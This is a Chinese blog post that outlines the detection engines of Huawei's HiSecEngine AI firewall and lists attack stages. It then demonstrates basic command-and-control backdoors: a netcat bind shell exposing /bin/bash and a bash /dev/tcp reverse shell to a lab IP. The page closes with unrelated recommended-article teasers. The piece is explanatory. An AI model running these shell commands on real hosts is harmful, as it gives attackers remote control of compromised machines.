CC驻点你应该知道的事
最近被华为HiSecEngine[1] AI防火墙刷爆了朋友圈,它内置了三大威胁防御引擎,分别是NGE、CDE和AIE。以下是自己的理解,可能说的不对,欢迎留言讨论。
- NGE:作为NGFW检测引擎,提供IPS、反病毒和URL过滤等内容安全相关的功能
大白话说:就是特征库检测
- CDE:可提供数据深度分析,暴露威胁的细节,快速检测恶意文件
大白话说:就是沙箱检测
- AIE:APT威胁检测引擎,针对暴力破解、C&C、DGA域名和加密威胁流量进行检测
大白话说:就是AI行为检测
对AIE引擎颇有兴趣,有监督的有3类:
- 失陷主机检测:失陷后的行为比较诡异,可能C&C,也可能转移,不知道华为怎么定义?
- C&C通道检测:失陷后为了维持权限,种下的后门程序,这是一个比较明确的突破口。
- 加密外发检测:正在学习...
无监督的有1类:
- 暴力破解检测:对RDP、SSH等流量进行K-Means聚类?
攻击矩阵:
信息收集、扫描探测、边界突破、建立驻点、权限提升、内部转移、数据盗取、数据外发。
入门级的C&C场景[2]:
点个赞呗,待会来写高级部分
场景一:失陷主机在非军事区
- 公网服务器失陷,攻击者成功入侵后,将bash发布出去,等待控制端来连接
nc -lvvp 2019 -t -e /bin/bash
- 攻击者控制端(103),主动连接失陷服务器(105)
nc 192.168.0.105 2019
- 此时,后门已经稳定建立了,失陷主机的2019端口一直打开着,任何人都能控制它
场景二:失陷主机在内网
- 攻击者控制端(103)主动监听2019端口,等待失陷主机(105)来舔
nc -vlp 2019
- 失陷主机(105)舔攻击者控制端(103)
bash -i >& /dev/tcp/192.168.0.103/2019 0>&1
- 此时,后门已经稳定建立了,失陷主机(105)与攻击者(103)一直保持着连接
带货环节:
CC驻点你应该知道的事相关推荐
- APP推广前,你应该知道的事
前言:随着中国互联网渗透率的逐步提高,中国广告主的广告投放重心逐渐向互联网迁移.互联网广告投放占比上升趋势明显.调查表明,随着用户逐步向移动端迁徙,广告主也正快速接受甚至追捧移动广告,广告主在移动端的 ...
- 比尔·盖茨:关于新冠疫苗你需要知道的事
这些天我被问得最多的一个问题是:世界何时才能回到去年12月新冠病毒大流行之前的状态?我的答案始终如一:当我们得到一种近乎完美的特效药的时候,或者当地球上几乎所有人都接种了新冠疫苗的时候. 前者不太可能 ...
- 产品经理面试必须知道的事
最近"产品经理面试太难了吧!"这句话一直在我耳边缠绕.其实我觉得还好吧,我只会觉得你可能是没技巧.下面金老师给大家分享一下字节跳动产品经理招聘的面试干货. 应该没有人不知道字节跳动 ...
- 大数据软件的真假分辨,消费者一定要知道的事!
大数据软件的真假分辨,消费者一定要知道的事! 大数据时代,各种各样的新东西出现,让大家的生活都变的更便利,快捷了.但是一个新的好东西的出现,势必会引来大量的不良商家开始争相模仿.恶意竞争,打乱了市场动 ...
- “真希望我第一次创业时就知道的事”
我们常常事后诸葛亮.当你回头看看之前做过的项目或努力,你总能更好地意识到什么事重要.什么事不重要. 在创业上也是一样的.在一项事业上奋斗了一两年或更多的时间后,你总能更好地意识到一些事是值得担心的,而 ...
- eBay跨境电商建议指南:eBay开店之前你就该知道的事
做eBay跨境电商的卖家千千万万,到底要怎么做才能在这个平台大卖呢?这是东哥最近私信很多人都在问的一个问题,东哥作为eBay老鸟,不得不说在这个问题上真的有很多建议想跟新手卖家们提一提.所以今天东哥的 ...
- 入门深度学习?这里有5件你应该知道的事
作者|PURVA HUILGOL 编译|Flin 来源|analyticsvidhya 开始你的深度学习生涯? 对于新手来说,深度学习是一个复杂而令人生畏的领域.像隐藏层.卷积神经网络.反向传播等概念 ...
- 串口,com口,ttl,max232你应该知道的事
1 今天,说几个比较基础的知识,大家在开发过程中经常会遇到但是又不是特别注意的知识点. TTL电平: TTL是Transistor-Transistor Logic,即晶体管-晶体管逻辑的简称,它是计 ...
- 开口谈薪水前,你一定要知道的事!
我想是因为自己是从事人力资源管理工作的缘故,朋友们都很习惯询问我关于转职相关的问题,最近身边有二位朋友不约而同地打算转职,然后再加上这个部落格接连地接到几位网友类似的询问,所以我想在此分享这个对很多人 ...
最新文章
- 设备树 xlnx-phy 使用
- sql 根据多个ID删除表中多行数据
- strace命令学习
- 基于ABP落地领域驱动设计-05.实体创建和更新最佳实践
- 抢先看!Kubernetes v1.21 新特性一览
- MySQL自用脚本(不定期更新)
- c语言机考答案,全国计算机等级考试C语言上机试题题库(内附答案)
- μC/OS-II实时性能测试与分析
- 为什么属龙的有二婚命_为什么属龙的有二婚命 一生婚姻运势详解
- linux 之 sed
- C# 入门(0807):流程控制
- NoSQLAttack针对 mongoDB 的攻击工具
- 错误: 实例 ruiy 执行所请求操作失败,实例处于错误状态。: 请稍后再试 [错误: #39;ascii#39; codec can#39;t decode byte 0xe6 in po...
- 踏上Oracle ebs的道路
- 高中生用台灯哪种好?2023最好的台灯品牌排行榜
- 2020 ACL《CoGAN》- Aspect Sentiment Classification with Document-level Sentiment Preference Modeling
- figma中文显示不出_我的figma愿望列出了2020年要构建的10个功能
- C语言:三色球问题:12个中3红3白6黑,取8个求共有多少种可能
- bit 和 byte 、kbyte
- oracle ORA-01704: string literal too long问题分析